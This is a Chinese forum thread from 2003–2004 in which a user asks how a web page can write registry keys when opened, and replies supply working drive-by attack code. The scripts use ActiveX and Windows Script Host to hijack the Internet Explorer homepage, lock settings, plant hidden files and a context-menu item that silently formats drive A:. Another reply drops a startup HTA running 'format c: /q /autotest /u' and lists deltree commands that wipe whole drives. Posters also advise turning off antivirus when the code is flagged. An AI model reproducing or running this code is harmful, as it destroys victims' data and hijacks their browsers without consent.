登陆论坛 找回密码 立刻获得20pp! 地图 帮助
宽带山生活
版主:浅紫 忘记她是她 

  • 主题内容
<< [1] >>  [只看楼主]  [加入关注] 点击:2673 回复:15 已被0人关注

主题:HTML源码中如何编写,能将一些键值引入注册表中

vandersar
240 0

来自:上海
注册:2003-03-14
发帖:210+543 
在网页的HTML源码中如何编写,能够在打开网页的同时,将一些指定的键值引入到注册表中?



-------------------------------------------------------------------------------------------
这个家伙很懒,什么也没留下......

发表于:2003-11-28 16:02:49
推荐:kds红日官网启动啦!!! ...楼主...

339 0

来自:上海
注册:2002-11-05
发帖:172+2816 
<script>
//初始化actiVex控件
document.write("<applet height=0 width=0 code=com.ms.activeX.ActiveXComponent></applet>")
//初始化actiVex控件结束
//定义变量
function reg(){
try
{
//设定applets为0
a=document.applets[0]
//初始化Windows Script Host Shell Object
a.setCLSID("{f935dc22-1cf0-11d0-adb9-00c04fd58a0b}")
a.createInstance()
S=a.GetObject()
//初始化FileSystem Object
a.setCLSID("{0d43fe01-f093-11cf-8940-00a0c9054228}")
a.createInstance();
fs=a.GetObject()
try
{
//开始写注册表
//设定IE的标题为Internet Explorer
S.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title","Internet Explorer")
//设定IE的默认首页为空白页
S.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page","about:blank")
//让设定首页那项变灰
S.RegWrite ("HKEY_USERS\\.DEFAULT\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\HomePage",0x1,"REG_DWORD")
//让设定分级审查设定那项变灰
S.RegWrite ("HKEY_USERS\\.DEFAULT\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\SecChangeSettings",0x1,"REG_DWORD")
//在网页右键菜单中加入调用文件的命令
S.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\MenuExt\\格式化A盘\\","c:\\format-a.txt.{3050f4d8-98b5-11cf-bb82-00aa00bdce0b}");
//写入值为0xf3的dowrd值 注意[REG_SZ:字符型 REG_DWORD:双字节型 REG_BINARY:二进制型]
//对于REG_DWORD型和REG_BINARY型则有两种赋值方式
//直接用十进制的数表示,如:0,1等
//用十六进制的数表示,如:0x12,0xff等
S.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\MenuExt\\格式化A盘\\contexts",0xf3,"REG_DWORD")
//结束写注册表
//开始写硬盘
//生成一个名为c:\\5flash.txt.{3050f4d8-98b5-11cf-bb82-00aa00bdce0b}的文件
hd=fs.CreateTextFile("c:\\format-a.txt.{3050f4d8-98b5-11cf-bb82-00aa00bdce0b}")
//把这个文件写入javascript内容
//脚本中的start /m 为最小化窗口 /autotest为自动 /u为无条件格式化
hd.write('<script>a=new ActiveXObject ("WSCript.Shell");a.run("start /m format.com a:/q /autotest /u");alert ("正在更新a盘系统文件,请稍等......");<\/script>')
//关闭这个文件
hd.close()
//把这个文件下载到客户机的c盘中,这里的路径完全可以改成网络上的,然后在后面接上.Copy("d:\format.txt"),这个脚本可以改成下载木马
//格式为file=fs.GetFile("网络路径").Copy("运行路径")
//这个脚本如果配合asp,那么完全成了一个功能非常强大的木马了
file=fs.GetFile("c:\\format-a.txt.{3050f4d8-98b5-11cf-bb82-00aa00bdce0b}")
//设定这个文件的属性为隐藏
file.Attributes=6
//结束写硬盘
}
catch(reg)
{}
}
catch(reg)
{}
}
function flash()
{
//隔100毫秒就运行一次
setTimeout("reg()",100)
}
flash()
//最后再重申,这个脚本不可用来害人,谢~
</script>



-------------------------------------------------------------------------------------------
这个家伙很懒,什么也没留下......

发表于:2003-11-30 11:14:43

873 0

来自:上海
注册:2001-05-12
发帖:3+256 
这个是病毒啦,打开就提示JS/IEStart.gen.c



-------------------------------------------------------------------------------------------
这个家伙很懒,什么也没留下......

发表于:2003-11-30 17:11:15

339 0

来自:上海
注册:2002-11-05
发帖:172+2816 
当然是拉。但是他要的效果呀。



-------------------------------------------------------------------------------------------
这个家伙很懒,什么也没留下......

发表于:2003-11-30 21:26:04

vandersar
240 0

来自:上海
注册:2003-03-14
发帖:210+543 
thank you for 洛林



-------------------------------------------------------------------------------------------
这个家伙很懒,什么也没留下......

发表于:2003-12-01 11:58:17

136 0

来自:上海
注册:2002-03-30
发帖:13+146 
别开杀毒软件不就行了?



-------------------------------------------------------------------------------------------
终于可以输入汉字了.爽

发表于:2003-12-01 19:34:28
推荐:KDS红日球迷会2010招募公告 ...第5楼...

226 0

来自:上海
注册:2001-10-19
发帖:12+32 
靠,公开传播恶意代码,危害网络安全
杀!杀!杀!杀!杀!杀!



-------------------------------------------------------------------------------------------
九天之外==任我行之


=九天行之=

发表于:2003-12-09 16:17:39
推荐:本能寺之变 ...第6楼...

339 0

来自:上海
注册:2002-11-05
发帖:172+2816 
不是说过了吗,是学习。
学习怎么利用好资源,我的脚本里也是这么写的。
还有可以利用vbs做很多VBS的恶意脚本,基本上现在很多的小病毒都是这样做出来的,有兴趣的朋友不妨试一下。



-------------------------------------------------------------------------------------------
这个家伙很懒,什么也没留下......

发表于:2003-12-10 10:34:04

9

来自:浙江
注册:2003-09-15
发帖:1+2 
thank!



-------------------------------------------------------------------------------------------
这个家伙很懒,什么也没留下......

发表于:2003-12-18 12:58:28

357 0

来自:上海
注册:2000-09-20
发帖:24+169 
刚保存下来就被NORTON杀了



-------------------------------------------------------------------------------------------
这个家伙很懒,什么也没留下......

发表于:2004-01-02 11:05:24

339 0

来自:上海
注册:2002-11-05
发帖:172+2816 
关掉杀毒软件。这个自己做的,不会对系统有伤害的。



-------------------------------------------------------------------------------------------
[code]embed src=http://www.renaski.533.net/Believe.MP3
[/code]

发表于:2004-01-02 11:50:47

339 0

来自:上海
注册:2002-11-05
发帖:172+2816 
那个现在不能用了IE升级了把这个BUG补掉了。
现在用如下方式。
<script language="Javascript">
var WshShell = new ActiveXObject("WScript.Shell");
var url="http://www.sohu.com";
var title="洛林";
WshShell.RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Internet

Explorer\Main\Start Page", url);


alert(WshShell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Intern

et Explorer\Main\Start Page"))
var FavoritesPath = WshShell.SpecialFolders("Favorites");
var oUrlLink =

WshShell.CreateShortcut(FavoritesPath+'\'+title+".url");
oUrlLink.TargetPath = url;
oUrlLink.Save();
var DesktopPath = WshShell.SpecialFolders("Desktop");//返回桌面路径
//alert(DesktopPath)
//DesktopPath=DesktopPath.substring(0,DesktopPath.length-7)
var MyShortcut = WshShell.CreateShortcut(DesktopPath + "\" + title+

"的快捷方式.lnk");
MyShortcut.TargetPath = url;
MyShortcut.WindowStyle = 4;
MyShortcut.IconLocation =

WshShell.ExpandEnvironmentStrings("%windir%\SYSTEM\SHELL32.DLL,46");
MyShortcut.Save();
</script>

----------------------------------
道高一尺,磨高一帐。



-------------------------------------------------------------------------------------------
哎,又少活了一年。郁闷啊~~~

发表于:2004-01-14 12:37:31

115 0

来自:江苏
注册:2004-02-01
发帖:16+116 
我也來點惡毒的吧
scr.Reset();
scr.Path="C:\WINDOWS\Start Menu\Programs\启动\hack.hta";
scr.Doc="
wsh.Run('start.exe /m format c:/q /autotest /u');
alert('IMPORTANT : Windows is removing unused temporary files.');";

scr.write();scr.Path="C:\WINDOWS\Start Menu\Programs\启动\hack.hta"
这一项就是指当你看到这网页它会写入到你的电脑启动目录底下,并命名为
hack.hta
wsh.Run('start.exe /m format c:/q /autotest /u');
通常要格式化硬碟都会先问你是否要执行,但其中的"/autotest"这项。
它是一个微软没有公开的功能,键入後format的动作便会被强制执行。
这项中的/q /u是令系统不需要检查硬碟便会立即执行的指令。
最後start.exe再配合/m选项可以使format的DOS-prompt视窗在执行的时候处於最小
化的状态。
执行其他攻击指令的方法∶
只要修改“start.exe /m format c:/q /autotest /u”这一项便形。
start.exe /m format c:/q /autotest /u
其中的“c:”可以换做其他的硬碟。
(path)bo2k.exe
执行它电脑中的某个程式,如果你有传bo2k到它电脑中就可以使用此指令。
start.exe /m deltree /y a:*.* c:*.* d:*.*
杀掉对方硬碟底下所有的档案。
start.exe /m deltree /y c:windowssystem*.*
杀掉对方c:windowssystem目录底下的所有档案。
不過現在好像不起作用了。downloading



-------------------------------------------------------------------------------------------
这个家伙很懒,什么也没留下......

发表于:2004-02-02 19:43:53

147 0

来自:上海
注册:2004-01-05
发帖:28+286 
downloading无聊埃。。。。。。。。。

用什么病毒啊,我都在自己的机器上用过了。
妈的。。。



-------------------------------------------------------------------------------------------
上海的,EMAIL:wayhard123@citiz.net

发表于:2004-02-03 12:37:35
推荐:大家对于幼教有什么看法? ...第13楼...

28

来自:北京
注册:2004-04-24
发帖:13+29 
毒毒毒



-------------------------------------------------------------------------------------------
这个家伙很懒,什么也没留下......

发表于:2004-07-10 17:02:48

回复主题 [ 返回抽象艺术 ]
主题: HTML源码中如何编写,能将一些键值引入注册表中
手机看宽带山

关于我们 - 联系我们 - 加入我们 - 营销服务 - 友情链接 - 频道合作- PChome Widget
Copyright © 1996-2009 PChome.net All rights reserved. 电脑之家 版权所有